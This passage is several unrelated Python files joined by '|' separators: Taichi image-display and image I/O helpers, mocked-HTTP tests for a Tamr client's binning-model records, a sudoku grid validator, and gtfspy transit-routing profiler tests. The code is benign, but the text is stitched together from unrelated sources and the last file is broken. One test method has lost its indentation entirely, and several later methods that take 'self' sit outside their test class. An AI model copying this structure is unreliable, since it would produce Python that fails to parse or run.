        # Promote greyscale (H, W) to (H, W, 1).
        img = img.reshape(*img.shape, 1)
    assert img.shape[2] in (1, 3, 4), "Image must be either RGB/RGBA or greyscale"
    return img.swapaxes(0, 1)[::-1, :]
def imdisplay(img):
    """
    Try to display image in interactive shell.

    Inside IPython/Jupyter the image is rendered inline as a PNG; otherwise
    it falls back to a Taichi GUI window via ti.imshow.

    Args:
        img (Union[ti.field, np.ndarray]): A field or array with shape `(width, height)` or `(height, width, 3)` or `(height, width, 4)`.
    """
    try:
        get_ipython()
    except NameError:
        # Bug fix: the previous bare `except:` also swallowed KeyboardInterrupt
        # and unrelated errors; only NameError means "not inside IPython".
        ti.imshow(img)
    else:
        import IPython.display  # pylint: disable=C0415
        import PIL.Image  # pylint: disable=C0415
        img = cook_image_to_bytes(img)
        with BytesIO() as f:
            PIL.Image.fromarray(img).save(f, 'png')
            IPython.display.display(IPython.display.Image(data=f.getvalue()))
def imresize(img, w, h=None):
    """Resize an image with nearest-neighbour sampling.

    Args:
        img (Union[ti.field, np.ndarray]): A field or array with shape `(width, height, ...)`
        w (int): The output width after resize.
        h (int, optional): The output height after resize, will be the same as width if not set. Default to `None`.

    Returns:
        np.ndarray: The resized image (the input itself if the size matches).
    """
    if not isinstance(img, np.ndarray):
        img = img.to_numpy()
    if h is None:
        h = w
    if (w, h) == img.shape[:2]:
        # Already the requested size; return the input unchanged.
        return img
    assert isinstance(w, int) and isinstance(h, int) and w > 1 and h > 1
    # Nearest-neighbour source index for every output column/row.
    scale_x = img.shape[0] / w
    scale_y = img.shape[1] / h
    src_x = np.clip(np.arange(w) * scale_x, 0, img.shape[0] - 1).astype(np.int32)
    src_y = np.clip(np.arange(h) * scale_y, 0, img.shape[1] - 1).astype(np.int32)
    return img[tuple(np.meshgrid(src_x, src_y))].swapaxes(0, 1)
def imwrite(img, filename):
    """Save a field to a a specific file.

    Args:
        img (Union[ti.field, np.ndarray]): A field of shape `(height, width)` or `(height, width, 3)` or `(height, width, 4)`, \
            if dtype is float-type (`ti.f16`, `ti.f32`, `np.float32` etc), **the value of each pixel should be float between \[0.0, 1.0\]**. Otherwise `ti.imwrite` will first clip them into \[0.0, 1.0\]\
            if dtype is int-type (`ti.u8`, `ti.u16`, `np.uint8` etc), , **the value of each pixel can be any valid integer in its own bounds**. These integers in this field will be scaled to \[0, 255\] by being divided over the upper bound of its basic type accordingly.
        filename (str): The filename to save to.
    """
    cooked = cook_image_to_bytes(img)
    # The C core reads raw memory, so the buffer must be contiguous.
    cooked = np.ascontiguousarray(cooked)
    shape = cooked.shape
    _ti_core.imwrite(filename, cooked.ctypes.data, shape[1], shape[0], shape[2])
def imread(filename, channels=0):
    """Load image from a specific file.

    Args:
        filename (str): An image filename to load from.
        channels (int, optional): The channels hint of input image, Default to 0.

    Returns:
        np.ndarray : An output image loaded from given filename.
    """
    # The core returns a raw pixel pointer plus dimensions.
    ptr, resx, resy, comp = _ti_core.imread(filename, channels)
    img = np.ndarray(shape=(resy, resx, comp), dtype=np.uint8)
    img = np.ascontiguousarray(img)
    # Copy the core's buffer into the (contiguous) NumPy allocation.
    # TODO(archibate): Figure out how np.ndarray constructor works and replace:
    _ti_core.C_memcpy(img.ctypes.data, ptr, resx * resy * comp)
    # Discussion: https://github.com/taichi-dev/taichi/issues/802
    # Transpose/flip from the core's row order to (x, y) indexing.
    return img.swapaxes(0, 1)[:, ::-1, :]
def imshow(img, window_name='imshow'):
    """Show image in a Taichi GUI.

    Blocks until the window is closed or ESC is pressed.

    Args:
        img (Union[ti.field, np.ndarray]): A field or array with shape `(width, height)` or `(height, width, 3)` or `(height, width, 4)`.
        window_name (str, optional): The title of GUI window. Default to `imshow`.
    """
    if not isinstance(img, np.ndarray):
        img = img.to_numpy()
    assert len(img.shape) in (2, 3), "Image must be either RGB/RGBA or greyscale"
    with ti.GUI(window_name, res=img.shape[:2]) as gui:
        cooked = gui.cook_image(img)
        while gui.running:
            # ESC closes the window on the next iteration.
            if gui.get_event(ti.GUI.ESCAPE):
                gui.running = False
            gui.set_image(cooked)
            gui.show()
|
from functools import partial
import json
import responses
from tamr_unify_client import Client
from tamr_unify_client.auth import UsernamePasswordAuth
# Canned mastering-project resource as returned by GET /projects/1.
project_config = {
    "name": "Project 1",
    "description": "Mastering Project",
    "type": "DEDUP",
    "unifiedDatasetName": "Project 1 - Unified Dataset",
    "externalId": "Project1",
    "resourceId": "1",
}
# Versioned-API endpoint for the project used by every test below.
project_url = "http://localhost:9100/api/versioned/v1/projects/1"
@responses.activate
def test_binning_model_records():
    """GET binning-model records are parsed back into the original dicts."""
    expected_records = [
        {
            "id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bb8"],
            "isActive": ["true"],
            "clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
            "similarityFunction": ["COSINE"],
            "tokenizer": ["DEFAULT"],
            "fieldName": ["surname"],
            "threshold": ["0.75"],
        }
    ]
    records_url = (
        "http://localhost:9100/api/versioned/v1/projects/1/binningModel/records"
    )
    # The API streams newline-delimited JSON, one record per line.
    ndjson_body = "\n".join(json.dumps(record) for record in expected_records)
    responses.add(responses.GET, project_url, json=project_config)
    responses.add(responses.GET, records_url, body=ndjson_body)
    client = Client(UsernamePasswordAuth("username", "password"))
    mastering_project = client.projects.by_resource_id("1").as_mastering()
    fetched = list(mastering_project.binning_model().records())
    assert fetched == expected_records
@responses.activate
def test_binning_model_update_records():
    """CREATE updates built from records are streamed verbatim to the API."""
    records_body = [
        {
            "id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bb8"],
            "isActive": ["true"],
            "clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
            "similarityFunction": ["COSINE"],
            "tokenizer": ["DEFAULT"],
            "fieldName": ["surname"],
            "threshold": ["0.75"],
        },
        {
            "id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bc9"],
            "isActive": ["true"],
            "clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
            "similarityFunction": ["COSINE"],
            "tokenizer": ["DEFAULT"],
            "fieldName": ["surname"],
            "threshold": ["0.75"],
        },
        {
            "id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bd8"],
            "isActive": ["true"],
            "clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
            "similarityFunction": ["COSINE"],
            "tokenizer": ["DEFAULT"],
            "fieldName": ["surname"],
            "threshold": ["0.75"],
        },
    ]
    # One CREATE command per record, in the same order.
    expected_updates = [
        {
            "action": "CREATE",
            "recordId": "d8b7351d-24ce-49aa-8655-5b5809ab6bb8",
            "record": {
                "id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bb8"],
                "isActive": ["true"],
                "clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
                "similarityFunction": ["COSINE"],
                "tokenizer": ["DEFAULT"],
                "fieldName": ["surname"],
                "threshold": ["0.75"],
            },
        },
        {
            "action": "CREATE",
            "recordId": "d8b7351d-24ce-49aa-8655-5b5809ab6bc9",
            "record": {
                "id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bc9"],
                "isActive": ["true"],
                "clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
                "similarityFunction": ["COSINE"],
                "tokenizer": ["DEFAULT"],
                "fieldName": ["surname"],
                "threshold": ["0.75"],
            },
        },
        {
            "action": "CREATE",
            "recordId": "d8b7351d-24ce-49aa-8655-5b5809ab6bd8",
            "record": {
                "id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bd8"],
                "isActive": ["true"],
                "clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
                "similarityFunction": ["COSINE"],
                "tokenizer": ["DEFAULT"],
                "fieldName": ["surname"],
                "threshold": ["0.75"],
            },
        },
    ]
    snoop_dict = {}
    def update_callback(request, snoop):
        # Capture the raw request body so the streamed payload can be checked.
        snoop["payload"] = request.body
        return 200, {}, "{}"
    update_records_url = (
        "http://localhost:9100/api/versioned/v1/projects/1/binningModel/records"
    )
    responses.add(responses.GET, project_url, json=project_config)
    responses.add_callback(
        responses.POST,
        update_records_url,
        callback=partial(update_callback, snoop=snoop_dict),
    )
    tamr = Client(UsernamePasswordAuth("username", "password"))
    project = tamr.projects.by_resource_id("1").as_mastering()
    binning_model = project.binning_model()
    updates = [
        {"action": "CREATE", "recordId": record["id"][0], "record": record}
        for record in records_body
    ]
    binning_model.update_records(updates)
    # NOTE(review): this iterates request.body item by item -- assumes the
    # client posts an iterable of JSON strings (a streamed body), not a single
    # str; confirm against tamr_unify_client's update_records implementation.
    actual = [json.loads(item) for item in snoop_dict["payload"]]
    assert expected_updates == actual
|
# Valid 3x3 grid: every row and column contains 1..3 exactly once.
correct = [[1, 2, 3],
           [2, 3, 1],
           [3, 1, 2]]
# 4x4 grid with repeated values in rows and columns.
incorrect = [[1, 2, 3, 4],
             [2, 3, 1, 3],
             [3, 1, 2, 3],
             [4, 4, 4, 4]]
# Rows are valid permutations but some columns contain duplicates.
incorrect2 = [[1, 2, 3, 4],
              [2, 3, 1, 4],
              [4, 1, 2, 3],
              [3, 4, 1, 2]]
# 5x5 grid containing 6, which is out of range for 1..5.
incorrect3 = [[1, 2, 3, 4, 5],
              [2, 3, 1, 5, 6],
              [4, 5, 2, 1, 3],
              [3, 4, 5, 2, 1],
              [5, 6, 4, 3, 2]]
# Letters instead of the required integers.
incorrect4 = [['a', 'b', 'c'],
              ['b', 'c', 'a'],
              ['c', 'a', 'b']]
# Non-integer (float) entries.
incorrect5 = [[1, 1.5],
              [1.5, 1]]
# Define a function check_sudoku() here:
def check_elements(content, matrix):
    """Return True if every row of *matrix* is a permutation of *content*.

    Args:
        content: sorted list of expected values (e.g. [1, 2, 3]).
        matrix: list of rows to validate.

    Returns:
        bool: True when each sorted row equals *content*.
    """
    # Bug fix: use sorted() instead of in-place row.sort(), so the caller's
    # matrix is no longer mutated as a side effect of validation.
    return all(sorted(row) == content for row in matrix)
def check_sudoku(square):
    """Return True if *square* is a valid sudoku-style grid.

    A valid grid of dimension n contains each integer 1..n exactly once in
    every row and every column.

    Args:
        square: list of rows (lists) forming the candidate grid.

    Returns:
        bool: True for a valid grid; False otherwise.  Empty or ragged
        (non-square) input returns False instead of raising, which the
        original did for an empty grid.
    """
    if not square:
        return False
    dim = len(square)
    # Reject ragged / non-square input up front.
    if any(len(row) != dim for row in square):
        return False
    expected = list(range(1, dim + 1))
    rows_ok = all(sorted(row) == expected for row in square)
    # zip(*square) transposes the grid so columns get the same check.
    cols_ok = all(sorted(column) == expected for column in zip(*square))
    return rows_ok and cols_ok
# Smoke checks -- the expected result is noted after each call.
print(check_sudoku(incorrect))
# >>> False
print(check_sudoku(correct))
# >>> True
print(check_sudoku(incorrect2))
# >>> False
print(check_sudoku(incorrect3))
# >>> False
print(check_sudoku(incorrect4))
# >>> False
print(check_sudoku(incorrect5))
# >>> False
|
from unittest import TestCase
import networkx
from six import StringIO
from gtfspy.routing.connection import Connection
from gtfspy.routing.label import min_arrival_time_target, LabelTimeWithBoardingsCount, LabelTime
from gtfspy.routing.multi_objective_pseudo_connection_scan_profiler import MultiObjectivePseudoCSAProfiler
from gtfspy.routing.node_profile_multiobjective import NodeProfileMultiObjective
import pyximport
pyximport.install()
class TestMultiObjectivePseudoCSAProfiler(TestCase):
# noinspection PyAttributeOutsideInit
    def setUp(self):
        """Build a small 5-stop transit scenario shared by several tests."""
        # Connection tuples: (dep_stop, arr_stop, dep_time, arr_time, trip_id, seq).
        event_list_raw_data = [
            (2, 4, 40, 50, "trip_6", 1),
            (1, 3, 32, 40, "trip_5", 1),
            (3, 4, 32, 35, "trip_4", 1),
            (2, 3, 25, 30, "trip_3", 1),
            (1, 2, 10, 20, "trip_2", 1),
            (0, 1, 0, 10, "trip_1", 1)
        ]
        self.transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        # Walking links; d_walk divided by walk_speed gives the walking time.
        self.walk_network = networkx.Graph()
        self.walk_network.add_edge(1, 2, d_walk=20)
        self.walk_network.add_edge(3, 4, d_walk=15)
        self.walk_speed = 1
        self.target_stop = 4
        self.transfer_margin = 0
        self.start_time = 0
        self.end_time = 50
    def test_pseudo_connections(self):
        """Walk links between trips are materialized as 'pseudo' connections."""
        event_list_raw_data = [
            (0, 1, 10, 20, "trip_6", 1),
            (2, 3, 42, 50, "trip_5", 1)
        ]
        transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        walk_network = networkx.Graph()
        walk_network.add_edge(1, 2, d_walk=20)
        walk_speed = 1
        target_stop = 3
        transfer_margin = 0
        start_time = 0
        end_time = 50
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        # Two transit connections plus one generated walk connection.
        self.assertEqual(len(csa_profile._all_connections), 3)
        pseudo_connection = csa_profile._all_connections[1]
        self.assertTrue(pseudo_connection.is_walk)
        # The walk departs as late as possible: arrival 42 minus 20 s of walking.
        self.assertEqual(pseudo_connection.departure_time, 42 - 20)
        self.assertEqual(pseudo_connection.arrival_time, 42)
        self.assertEqual(pseudo_connection.departure_stop, 1)
        self.assertEqual(pseudo_connection.arrival_stop, 2)
        # Expected departure events registered in each stop profile.
        node_to_connection_dep_times = {
            0: [10],
            1: [42 - 20],
            2: [42],
            3: [],
        }
        for node, dep_times in node_to_connection_dep_times.items():
            profile = csa_profile._stop_profiles[node]
            for dep_time in dep_times:
                self.assertIn(dep_time, profile.dep_times_to_index, "Node: " + str(node))
            for dep_time in profile.dep_times_to_index:
                self.assertIn(dep_time, dep_times, "Node: " + str(node))
        for connection in csa_profile._all_connections:
            arrival_stop_profile = csa_profile._stop_profiles[connection.arrival_stop]
            departure_stop_profile = csa_profile._stop_profiles[connection.departure_stop]
            self.assertIsInstance(arrival_stop_profile, NodeProfileMultiObjective)
            self.assertIsInstance(departure_stop_profile, NodeProfileMultiObjective)
            self.assertIn(connection.departure_time, departure_stop_profile.dep_times_to_index)
            if connection.arrival_stop_next_departure_time != float('inf'):
                self.assertIn(connection.arrival_stop_next_departure_time, arrival_stop_profile.dep_times_to_index)
    def test_pseudo_connections_with_transfer_margin(self):
        """The walk connection's timing is unaffected by the transfer margin."""
        event_list_raw_data = [
            (0, 1, 10, 20, "trip_6", 1),
            (2, 3, 42, 50, "trip_5", 1)
        ]
        transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        walk_network = networkx.Graph()
        walk_network.add_edge(1, 2, d_walk=10)
        walk_speed = 1
        target_stop = 3
        transfer_margin = 5
        start_time = 0
        end_time = 50
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        transfer_connection = csa_profile._all_connections[1]
        self.assertEqual(transfer_connection.arrival_stop, 2)
        # The next boardable departure at the arrival stop is the 42 s trip.
        self.assertEqual(transfer_connection.arrival_stop_next_departure_time, 42)
        self.assertEqual(transfer_connection.departure_stop, 1)
        self.assertEqual(transfer_connection.departure_time, 42 - 10)
        self.assertEqual(transfer_connection.is_walk, True)
        self.assertEqual(transfer_connection.arrival_time, 42)
    def test_basics(self):
        """Stop profiles for the shared setUp scenario hold the expected labels."""
        csa_profile = MultiObjectivePseudoCSAProfiler(self.transit_connections, self.target_stop,
                                                      self.start_time, self.end_time, self.transfer_margin,
                                                      self.walk_network, self.walk_speed)
        csa_profile.run()
        stop_3_labels = csa_profile.stop_profiles[3].get_final_optimal_labels()
        self.assertEqual(len(stop_3_labels), 1)
        self.assertIn(LabelTimeWithBoardingsCount(32, 35, n_boardings=1, first_leg_is_walk=False), stop_3_labels)
        stop_2_labels = csa_profile.stop_profiles[2].get_final_optimal_labels()
        self.assertEqual(len(stop_2_labels), 3)
        self.assertIn(LabelTimeWithBoardingsCount(40, 50, n_boardings=1, first_leg_is_walk=False), stop_2_labels)
        self.assertIn(LabelTimeWithBoardingsCount(25, 35, n_boardings=2, first_leg_is_walk=False), stop_2_labels)
        self.assertIn(LabelTimeWithBoardingsCount(25, 45, n_boardings=1, first_leg_is_walk=False), stop_2_labels)
        stop_one_profile = csa_profile.stop_profiles[1]
        stop_one_pareto_labels = stop_one_profile.get_final_optimal_labels()
        labels = list()
        # these should exist at least:
        labels.append(LabelTimeWithBoardingsCount(departure_time=10, arrival_time_target=35, n_boardings=3, first_leg_is_walk=False))
        labels.append(LabelTimeWithBoardingsCount(departure_time=20, arrival_time_target=50, n_boardings=1, first_leg_is_walk=False))
        labels.append(LabelTimeWithBoardingsCount(departure_time=32, arrival_time_target=55, n_boardings=1, first_leg_is_walk=False))
        # NOTE(review): `labels` is built but never asserted against
        # `stop_one_pareto_labels` -- the membership assertions appear to be
        # missing; confirm intent and add e.g. assertIn per expected label.
    def test_multiple_targets(self):
        """A list of target stops produces one optimal label per reachable target."""
        event_list_raw_data = [
            (1, 4, 40, 50, "trip", 1),
            (1, 5, 30, 40, "trip", 1),
        ]
        transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        walk_network = networkx.Graph()
        walk_speed = 1
        source_stop = 1
        # The profiler accepts a collection of targets, not just a single stop.
        targets = [4, 5]
        transfer_margin = 0
        start_time = 0
        end_time = 60
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, targets,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        csa_profile.run()
        source_stop_profile = csa_profile.stop_profiles[source_stop]
        final_labels = source_stop_profile.get_final_optimal_labels()
        self.assertEqual(2, len(final_labels))
    def test_simple(self):
        """A walk + single trip + walk journey yields exactly one optimal label."""
        event_list_raw_data = [
            (2, 4, 40, 50, "trip_5", 1),
        ]
        transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        walk_network = networkx.Graph()
        walk_network.add_edge(1, 2, d_walk=20)
        walk_network.add_edge(3, 4, d_walk=15)
        walk_speed = 1
        source_stop = 1
        target_stop = 4
        transfer_margin = 0
        start_time = 0
        end_time = 50
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        csa_profile.run()
        source_stop_profile = csa_profile.stop_profiles[source_stop]
        # The run must leave the source profile finalized and closed.
        self.assertTrue(source_stop_profile._finalized)
        self.assertTrue(source_stop_profile._closed)
        source_stop_labels = source_stop_profile.get_final_optimal_labels()
        labels = list()
        # Walk 1->2 (20 s) to board at 40, arrive 50; first leg is a walk.
        labels.append(LabelTimeWithBoardingsCount(departure_time=20,
                                                  arrival_time_target=50,
                                                  n_boardings=1,
                                                  first_leg_is_walk=True))
        self._assert_label_sets_equal(
            labels,
            source_stop_labels
        )
    def test_last_leg_is_walk(self):
        """A journey ending with a walk to the target is still reported."""
        event_list_raw_data = [
            (0, 1, 0, 10, "trip_1", 1)
        ]
        transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        walk_network = networkx.Graph()
        walk_network.add_edge(1, 2, d_walk=20)
        walk_speed = 1
        source_stop = 0
        target_stop = 2
        transfer_margin = 0
        start_time = 0
        end_time = 50
        labels = list()
        # Trip arrives at stop 1 at t=10, then a 20 s walk reaches the target at 30.
        labels.append(LabelTimeWithBoardingsCount(departure_time=0, arrival_time_target=30, n_boardings=1, first_leg_is_walk=False))
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        csa_profile.run()
        found_tuples = csa_profile.stop_profiles[source_stop].get_final_optimal_labels()
        self._assert_label_sets_equal(found_tuples, labels)
    def test_walk_is_faster_than_by_trip(self):
        """When walking beats the trip, no transit label is reported."""
        event_list_raw_data = [
            (0, 1, 0, 10, "trip_1", 1)
        ]
        transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        walk_speed = 0.5
        source_stop = 0
        target_stop = 1
        transfer_margin = 0
        start_time = 0
        end_time = 50
        walk_network = networkx.Graph()
        # Walking takes d_walk / walk_speed = 1 / 0.5 = 2 s, beating the 10 s trip.
        walk_network.add_edge(0, 1, d_walk=1)
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        csa_profile.run()
        source_profile = csa_profile.stop_profiles[source_stop]
        self.assertEqual(min_arrival_time_target(source_profile.evaluate(0, first_leg_can_be_walk=True)), 2)
        # The direct walk dominates, so no final (transit) labels remain.
        found_tuples = source_profile.get_final_optimal_labels()
        self.assertEqual(len(found_tuples), 0)
def test_no_multiple_walks(self):
event_list_raw_data = [
(0, 1, 0, 1, "trip_1", 1),
(1, 0, 0, 1, "trip_2", 1),
(0, 1, 2, 3, "trip_3", 1),
(1, 0, 2, 3, "trip_4", 1),
(0, 1, 4, 5, "trip_5", 1),
(1, 0, 4, 5, "trip_6", 1),
(1, 2, 5, 6, "trip_7", 1),
(2, 1, 5, 6, "trip_8", 1),
(1, 2, 2, 3, "trip_7", 2),
(2, 1, 2, 3, "trip_8", 2)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(0, 1, d_walk=1)
walk_network.add_edge(2, 1, d_walk=1)
walk_speed = 10
transfer_margin = 0
start_time = 0
end_time = 50
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, 2,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
source_profile = csa_profile.stop_profiles[0]
print(source_profile.get_final_optimal_labels())
for label in source_profile.get_final_optimal_labels():
self.assertGreater(label.n_boardings, 0)
    def test_target_node_not_in_walk_network(self):
        """A target absent from the walk network is still reachable by transit."""
        event_list_raw_data = [
            (0, 1, 0, 10, "trip_1", 1)
        ]
        transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        walk_speed = 2
        source_stop = 0
        target_stop = 1
        transfer_margin = 0
        start_time = 0
        end_time = 50
        # Deliberately empty: the target has no walk edges at all.
        walk_network = networkx.Graph()
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        csa_profile.run()
        source_profile = csa_profile.stop_profiles[source_stop]
        self.assertEqual(min_arrival_time_target(source_profile.evaluate(0, 0)), 10)
        found_tuples = source_profile.get_final_optimal_labels()
        self.assertEqual(len(found_tuples), 1)
    def test_pareto_optimality(self):
        """Both the direct trip and the faster 2-boarding option are kept."""
        event_list_raw_data = [
            (0, 2, 0, 10, "trip_1", 1),
            (0, 1, 2, 5, "trip_2", 1),
            (1, 2, 5, 8, "trip_3", 1)
        ]
        transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
        walk_speed = 2
        source_stop = 0
        target_stop = 2
        transfer_margin = 0
        start_time = 0
        end_time = 20
        walk_network = networkx.Graph()
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        csa_profile.run()
        source_profile = csa_profile.stop_profiles[source_stop]
        self.assertEqual(min_arrival_time_target(source_profile.evaluate(0, 0)), 8)
        found_labels = source_profile.get_final_optimal_labels()
        # Neither label dominates the other: fewer boardings vs earlier arrival.
        labels_should_be = list()
        labels_should_be.append(LabelTimeWithBoardingsCount(0, 10, n_boardings=1, first_leg_is_walk=False))
        labels_should_be.append(LabelTimeWithBoardingsCount(2, 8, n_boardings=2, first_leg_is_walk=False))
        self._assert_label_sets_equal(found_labels, labels_should_be)
    def test_transfer_margin(self):
        """A transfer margin invalidates transfers that are exactly back-to-back."""
        walk_speed = 1
        target_stop = 2
        start_time = 0
        end_time = 60
        transit_connections = [
            Connection(0, 1, 40, 50, "trip_1", 1),
            Connection(1, 2, 50, 60, "trip_1", 2),
            Connection(3, 1, 40, 50, "trip_2", 1),
        ]
        # case without any transfer margin
        transfer_margin = 0
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      networkx.Graph(), walk_speed)
        csa_profile.run()
        stop_profile_1 = csa_profile.stop_profiles[1]
        stop_profile_3 = csa_profile.stop_profiles[3]
        self.assertEqual(1, len(stop_profile_1.get_final_optimal_labels()))
        self.assertEqual(1, len(stop_profile_3.get_final_optimal_labels()))
        # case with transfer margin
        transfer_margin = 1
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      networkx.Graph(), walk_speed)
        csa_profile.run()
        stop_profile_3 = csa_profile.stop_profiles[3]
        stop_profile_1 = csa_profile.stop_profiles[1]
        # trip_2 arrives at 50, too late to transfer to the 50 departure;
        # staying on trip_1 (same trip, no transfer) is still possible.
        self.assertEqual(0, len(stop_profile_3.get_final_optimal_labels()))
        self.assertEqual(1, len(stop_profile_1.get_final_optimal_labels()))
    def test_possible_transfer_margin_bug_with_multiple_arrivals(self):
        """Regression test: margin handling when a stop has multiple arrivals."""
        walk_speed = 1
        target_stop = 3
        start_time = 0
        end_time = 200
        transfer_margin = 2
        transit_connections = [
            Connection(0, 1, 100, 101, "trip_0", 1),
            Connection(4, 1, 102, 104, "trip_1", 1),
            Connection(2, 3, 106, 108, "trip_2", 1)
        ]
        walk_network = networkx.Graph()
        walk_network.add_edge(1, 2, d_walk=1)
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        csa_profile.run()
        # From stop 4 (arrive 104, walk to 2 by 105) the margin of 2 misses
        # the 106 departure; from stop 0 (arrive 101) the transfer succeeds.
        profile = csa_profile.stop_profiles[4]
        self.assertEqual(len(profile.get_final_optimal_labels()), 0)
        profile = csa_profile.stop_profiles[0]
        self.assertEqual(len(profile.get_final_optimal_labels()), 1)
def test_transfer_margin_with_walk(self):
    """Transfer margin must also apply when the transfer involves a walk leg.

    Several 0->1 departures exist; the onward trip 2->3 leaves at 1060 and
    stop 1 connects to stop 2 by a 5-unit walk. As the margin grows by 10,
    the latest feasible departure from stop 0 moves 10 units earlier
    (see transfer_margins / journey_dep_times pairs below).
    """
    walk_speed = 1
    target_stop = 3
    start_time = 0
    end_time = 2000
    transit_connections = [
        Connection(0, 1, 1000, 1010, "trip__2", 1),
        Connection(0, 1, 1010, 1020, "trip__1", 1),
        Connection(0, 1, 1020, 1030, "trip_0", 1),
        Connection(0, 1, 1000, 1010, "trip_1", 1),
        Connection(0, 1, 1010, 1020, "trip_2", 1),
        Connection(0, 1, 1020, 1030, "trip_3", 1),
        Connection(0, 1, 1030, 1040, "trip_4", 1),
        Connection(2, 3, 1060, 1070, "trip_6", 1),
    ]
    walk_network = networkx.Graph()
    walk_network.add_edge(1, 2, d_walk=5)
    # expected latest departure time from stop 0 for each margin
    transfer_margins = [10, 20, 30, 40, 0]
    journey_dep_times = [1030, 1020, 1010, 1000, 1030]
    for transfer_margin, dep_time in zip(transfer_margins, journey_dep_times):
        csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                      start_time, end_time, transfer_margin,
                                                      walk_network, walk_speed)
        csa_profile.run()
        profile = csa_profile.stop_profiles[0]
        self.assertEqual(len(profile.get_final_optimal_labels()), 1, "transfer_margin=" + str(transfer_margin))
        label = profile.get_final_optimal_labels()[0]
        self.assertEqual(label.departure_time, dep_time, "transfer_margin=" + str(transfer_margin))
def test_basics_no_transfer_tracking(self):
    """Basic profile computation with boarding-count tracking disabled.

    Uses the shared fixtures (self.transit_connections etc., set up outside
    this view); with track_vehicle_legs=False the labels are plain LabelTime
    (departure_time, arrival_time_target) pairs.
    """
    csa_profile = MultiObjectivePseudoCSAProfiler(
        self.transit_connections, self.target_stop,
        self.start_time, self.end_time, self.transfer_margin,
        self.walk_network, self.walk_speed, track_vehicle_legs=False
    )
    csa_profile.run()
    # stop 3: a single Pareto-optimal departure
    stop_3_pareto_tuples = csa_profile.stop_profiles[3].get_final_optimal_labels()
    self.assertEqual(len(stop_3_pareto_tuples), 1)
    self.assertIn(LabelTime(32., 35.), stop_3_pareto_tuples)
    # stop 2: two optimal departures
    stop_2_pareto_tuples = csa_profile.stop_profiles[2].get_final_optimal_labels()
    self.assertEqual(len(stop_2_pareto_tuples), 2)
    self.assertIn(LabelTime(40., 50.), stop_2_pareto_tuples)
    self.assertIn(LabelTime(25., 35.), stop_2_pareto_tuples)
    # stop 1 (source): full expected Pareto frontier
    source_stop_profile = csa_profile.stop_profiles[1]
    source_stop_pareto_optimal_tuples = source_stop_profile.get_final_optimal_labels()
    pareto_tuples = list()
    pareto_tuples.append(LabelTime(departure_time=10, arrival_time_target=35))
    pareto_tuples.append(LabelTime(departure_time=20, arrival_time_target=50))
    pareto_tuples.append(LabelTime(departure_time=32, arrival_time_target=55))
    self._assert_label_sets_equal(
        pareto_tuples,
        source_stop_pareto_optimal_tuples
    )
def test_transfers_only(self):
    """Profile with only boarding counts tracked (track_time=False).

    Route to target 4: walk 3->4, or ride trip_5 from 2, or ride
    trip_6 + trip_5 from 7; the expected minimal boarding counts per
    origin stop are listed in stop_to_n_boardings.
    """
    event_list_raw_data = [
        (7, 2, 20, 30, "trip_6", 1),
        (2, 4, 40, 50, "trip_5", 1),
    ]
    transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
    walk_network = networkx.Graph()
    walk_network.add_edge(1, 2, d_walk=20)
    walk_network.add_edge(3, 4, d_walk=15)
    walk_speed = 1
    target_stop = 4
    transfer_margin = 0
    start_time = 0
    end_time = 50
    csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
                                                  start_time, end_time, transfer_margin,
                                                  walk_network, walk_speed, track_time=False)
    csa_profile.run()
